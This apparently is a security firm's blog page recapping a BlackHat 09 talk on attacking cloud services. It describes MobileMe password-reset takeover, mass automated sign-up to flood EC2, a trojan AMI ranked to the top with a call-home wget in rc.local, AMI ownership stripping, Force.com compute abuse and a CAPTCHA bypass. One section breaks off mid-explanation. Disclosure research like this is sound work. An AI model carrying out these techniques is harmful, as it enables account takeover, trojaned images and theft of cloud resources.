Performing authentication on a massive userbase with whom there is zero offline interaction is hard, especially when it comes down to the degraded authentication required by password reset processes. Considering that web interfaces appear to be the dominant channel by which cloud services are managed (we touch on the implications here), a flawed password reset process can mean that attackers gain access to more that simply your mail.
In August last year, TechCrunch published a way to enumerate usernames on MobileMe. We abused this further to target a specific user on MobileMe in order to reset his password. As the video shows, the process only requires a birthdate (which is generally obtainable either through FaceBook, Wikipedia, Amazon wishlists or the like) and a secret question. Again, with enough digging the answer to the secret question is often guessable. In the video above we show a toy example of the password reset working against a SensePoster.
Apple has since patched this bug.
Finally, we demonstrate the password reset attack against Woz's MobileMe account. We stopped before actually resetting his password, but in his own words he stores mail, calendaring info and other information that is sensitive to him on MobileMe, and the ability to XSS the page would mean that the continued compromise of the account was possible.
Theft of resources is the red-headed step-child of attack classes and doesn't get much attention, but on cloud platforms where resources are shared amongst many users these attacks can have a very real impact. With this in mind, we wanted to show how EC2 was vulnerable to a number of resource theft attacks and the videos below demonstrate three separate attacks against EC2 that permit an attacker to boot up massive numbers of machines, steal computing time/bandwidth from other users and steal paid-for AMIs.
For this video we wanted to consider a DoS on the EC2 from within, by running as many AMIs concurrently as possible.
Since sign-up for the sevice occurred in a browser, it was possible to script this process (using Twill for the most part). The first attack would be to boot hundreds or thousands of instances under one Amazon account, however an upper bound of 20 running machines per account is enforced by Amazon. Our approach was one step removed from this; we created multiple accounts and then ran the 20 machines. Each new account would also create multiple accounts and then run 20 machines. One iteration of the create-accounts-and-boot-AMIs cycle took three minutes; by the ninth iteration the projected number of running instances is ridiculous. It's apparent that this recursive registering of accounts and booting machines means that the number of running machines grows exponentially and this could continue until the system can't handle the machine load.
Our approach was effective because the registration process took no steps to prevent automated sign-up. In testing a single credit card was used to create our accounts which is an immediate anomaly however a malicious attacker would use stolen CC data to ensure that CC checks did not prevent new account registration.
As has been mentioned, users can choose AMIs from a list of machines that is mostly user-generated (out of 2700 odd machines, 47 were built by Amazon and the remainder by other users.) It is easy to add a machine to this list; simply create a new AMI and in its properties mark it as 'public'.
Our idea was to create a malicious AMI and add it to the public listing, with the goal being to show that users will run AMIs without any consideration for who built it or whether nasties were included. We quickly created an AMI, uploaded it and... nothing. No one ran the image and it seemed that people weren't so easily fooled.
Digging a little deeper, however, revealed that when our image was created, it was dumped on the second last page of the AMI listings and so users would have to surf through more than 50 pages of images before coming across our AMI. If Google has taught us anything, it's that ranking counts and so we needed to boost our machine up the AMI listing.
It turns out that the AMI listing is ordered by the AMI ID, which is a random id string that is generated when the AMI is created. Our process was then slightly modified as follows: we scripted the AMI registration process so that it was trivial to register an image. We then looped the registration script to create and register an AMI, and tested to see whether the randomly assigned AMI ID was low enough such that our AMI was listed on the first page.
Our first attempt took about 4000 iterations and landed us a top 5 spot in under 12 hours. A subsequent attempt took less than 4 hours to land a top 5 spot.
This was great, but our image was unattractively named 'qscanImage' runing on the 'Other Linux' platform, which didn't say much about it.
It turned out that we had a great degree of freedom in naming images. Images were stored in Amazon S3 buckets and the buckets had globally unique names. We tried buckets with names such as 'fedora', 'fedora_core' and 'redhat', but all these were taken, however with a small degree of evilness the bucket 'fedora_core_11' was available and so registered. The registration race was repeated with the better named machine, and after a little while we landed the AMI on the front page as shown in the screnshot below:
What's funny is that the machine was the highest listed 'Fedora' AMI, so a user who was specifically looking for a Fedora image would come across our evil image first.
In reality our image did not have anything malicious except a call-home line in '/etc/rc.local' that would 'wget' a file on our webserver, to show the image had been booted. The screenshot below shows the logline from our webserver which proved the image had been booted; this occurred in a little under four hours after the instance had been made public.
Our final Amazon video shows how it is possible to remove ancestry information from AMIs. When a paid-for machine is created, Amazon stores information about the owner of the machine in its manifest (which is an XML document) in order to pay the creator of the image. Our attack works as follows:
We aim to circumvent some of these controls in order to access more resources than should be allowed, and we demonstrate this on the Force.com platform which supports the ability for a developer to upload and execute custom code. Our proof-of-concept was to port Nikto into a Force.com application, and we named it Sifto.
In order to write applications on Force.com, a developer account is required (this is freely available). Applications are coded in the Apex language, a Java-like language for business logic, and is proprietary to the Force.com platform. This platform supports datastore operations through built-in language constructs and the API enables a developer to make HTTP callouts, tie Apex code to WS endpoints within Force.com, send emails as well as tie Apex code to an email endpoint within Force.com. The datastore is useful for maintaining state between multiple iterations of the event loop (described shortly) as well as providing a way to send emails for free via update triggers (emails sent from within Apex count against the daily limit).
With all this in mind, we focused on creating event loops the were initiated by a single user action, to show how significant free computing resources were available if one is prepared to put in the legwork of learning new languages and platforms.
The event loop method shown in video 1 was still subject to unpublished limits, and so instead of scaling by extending the number of iterations of the event loop, we decided to try and scale by registering many accounts. This was useful since accounts had zero cost. All that remained was to automate the registration process (see the slides for more details on this), and we accomplished this as shown in video 2, where a shell script automatically registered a bunch of accounts. The trick that allowed us to bypass the CAPTCHA in the registration page was a bug in the CAPTCHA script that also provided the image's text in ASCII-text (look for the lines "captcha captured:" in the video).
Of minor interest was that each account was registered in a different country. Since SalesForce assign accounts to instances (or geographically dispersed clusters) according to the customer's claimed location, we were able to register accounts on both the NA6 and AP1 instance, or North America and Asia Pacific respectively.
[updated: videos will be made available on this page]
140 slides in 75 minutes. They said it couldn't be done... and they were right! (mostly)
Regardless, our Vegas trip was as much fun as previous years and our presentations at BlackHat and DEFCON went down well from the looks of things. While we plan on writing up the interesting parts, a number of people have requested access to the slidedeck in the mean time, and we've posted them here:
Clobbering the cloud [PowerPoint]
(This is the BlackHat version; the DEFCON deck was trimmed down for time savings.)
[part 2 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]
They have gone to great lengths to avoid common webapp pitfalls, but even they are susceptible to known attacks as shown in the following video.
Our demonstration of Clickjacking focuses on the editing of a user's task list, but the principle is easily carried over to any click-based task.
As if it weren't already obvious, we note that XSS and CSRF attacks become much more than toy-attacks in a world were everything is controlled via a web-interface.